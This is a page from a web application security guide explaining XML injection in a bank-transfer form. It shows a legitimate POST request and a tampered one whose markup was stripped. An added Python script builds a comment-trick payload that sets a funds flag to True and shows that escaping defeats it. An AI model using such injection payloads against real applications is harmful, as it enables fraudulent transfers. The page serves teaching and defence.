Web application security - the fast guide 1.1 | Page 150
Chapter 7 - Attack execution (3)
the legitimate request will include the following:
POST /test/12/Default.aspx HTTP/1.0
Host: victim.com
Content-Length: 65
FromAccount=18281008&Amount=1430&ToAccount=08447656&Submit=Submit
The related XML message, built from those parameters, might be something like the following (in this copy the element tags have been stripped, so only the element values remain: the source account, the amount, a flag set to False, and the destination account):
18281008 1430 False 08447656
Now the attacker can simply include, in a parameter value, the closing tag of the element that value is placed in, followed by markup of their own, and so alter the values the message carries (in this copy of the listing the angle-bracketed tags and comment markers of the injected payload have been lost; only the text between them survives):
POST /test/12/Default.aspx HTTP/1.0
Host: victim.com
Content-Length: 125
FromAccount=18281008&Amount=1430True08447656&Submit=Submit
In the listing above the attacker closed the Amount element, supplied the values they wanted (the flag set to True and the destination account), and wrapped the application's own closing markup and its ToAccount tag in an XML comment, so that the resulting message remains well-formed XML and is accepted by the parser.
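The following script is an added example, not code from the book, and reconstructs the attack end to end so the well-formedness point can be checked with a real parser. The page does not show the element markup or name the flag element, so the <Transfer> wrapper and the <ClearedFunds> element name are assumptions; the three request bodies are constructed from the parameter values in the listings above. It builds the XML both the vulnerable way (raw string substitution) and the safe way (escaping before substitution), and reports what the back end sees in each case.

```python
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlencode
from xml.sax.saxutils import escape

# Assumed message layout: the book does not show the element markup or name
# the flag element, so <Transfer> and <ClearedFunds> are placeholder names.
TEMPLATE = (
    "<Transfer>"
    "<FromAccount>{FromAccount}</FromAccount>"
    "<Amount>{Amount}</Amount>"
    "<ClearedFunds>False</ClearedFunds>"
    "<ToAccount>{ToAccount}</ToAccount>"
    "</Transfer>"
)

# Constructed request parameters, using the values from the book's listings.
REQUESTS = {
    # The legitimate transfer.
    "legitimate": {
        "FromAccount": "18281008", "Amount": "1430", "ToAccount": "08447656",
    },
    # First attempt: close <Amount>, inject the flag and open <ToAccount> all
    # inside the Amount value. The template's own </Amount> then follows the
    # injected <ToAccount>, so the XML is not well-formed and gets rejected.
    "naive_injection": {
        "FromAccount": "18281008",
        "Amount": "1430</Amount><ClearedFunds>True</ClearedFunds><ToAccount>08447656",
        "ToAccount": "08447656",
    },
    # Comment trick: Amount opens an XML comment after the injected flag and
    # ToAccount closes it, so the template's </Amount>, the original flag and
    # its <ToAccount> tag all land inside the comment; the result is well-formed.
    "comment_trick": {
        "FromAccount": "18281008",
        "Amount": "1430</Amount><ClearedFunds>True</ClearedFunds><!--",
        "ToAccount": "--><ToAccount>08447656",
    },
}


def post_body(params):
    """URL-encode the parameters the way a client actually sends them."""
    return urlencode({**params, "Submit": "Submit"})


def build_vulnerable(params):
    """The flaw: request values are pasted into the XML as raw markup."""
    return TEMPLATE.format(**params)


def build_safe(params):
    """The fix: escape &, < and > so a request value can only ever be text."""
    return TEMPLATE.format(**{k: escape(v) for k, v in params.items()})


def parse_transfer(xml_text):
    """Return (well_formed, cleared_funds) as the back end would see them.

    ElementTree discards comments while parsing, which is exactly why the
    comment trick works: the commented-out markup never reaches the tree.
    """
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return (False, None)
    return (True, root.findtext("ClearedFunds"))


def handle_request(body, builder):
    """Server side: decode the POST body, build the XML message, parse it."""
    params = {k: v[0] for k, v in parse_qs(body).items()}
    return parse_transfer(builder(params))


if __name__ == "__main__":
    for name, params in REQUESTS.items():
        body = post_body(params)
        print(f"{name:16} vulnerable -> {handle_request(body, build_vulnerable)}"
              f"   escaped -> {handle_request(body, build_safe)}")
```

Running it shows the legitimate request parsing with the flag at False, the naive injection failing to parse at all, the comment-trick request parsing cleanly with the flag at True, and the same attack payload reduced to harmless text once the values are escaped before substitution. Escaping is the minimum fix; building the message with an XML library instead of string templates avoids the problem by construction.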
7.10 Attack Checklist